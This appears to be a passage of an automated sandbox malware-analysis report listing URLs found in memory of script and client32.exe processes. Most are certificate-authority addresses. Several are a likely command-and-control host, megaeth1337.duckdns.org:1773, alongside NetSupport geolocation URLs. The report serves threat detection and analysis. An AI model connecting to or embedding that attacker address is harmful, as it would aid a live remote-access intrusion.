                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021399670.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115009289331.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997111170.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114985870406.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115331791.0000000003209000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183118649.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973781450.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046287156.0000000003209000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115034047959.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149922654.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021399670.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115009038121.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997111170.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172297414.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/latlong.asp?lat=%s&lng=%s&lang=%sGet
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLatLongclose
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspY
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://localhost/ApprovedWebList.htmPrintSurveyInternet6
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115177447611.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183118649.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115177447611.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114560515905.0000000003231000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115183965861.000000000325D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102203122.0000000000A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/
                                Source: client32.exe, 00000020.00000002.115177447611.0000000000A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/$
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/(
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/:
                                Source: client32.exe, 00000020.00000003.114560515905.00000000031A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/C
                                Source: client32.exe, 00000020.00000003.115172079833.000000000325D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/Rs
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/b
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/f
                                Source: client32.exe, 00000020.00000002.115184199438.00000000033B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://megaeth1337.duckdns.org:1773/n
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226626711.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                Source: wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000005014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                                Source: Pyyidau.vbs.exe, 00000004.00000002.113950407001.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046944500.000000000B462000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 0000001E.00000003.114226577773.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114283016484.00000000038A6000.00000002.00000001.00040000.00000023.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
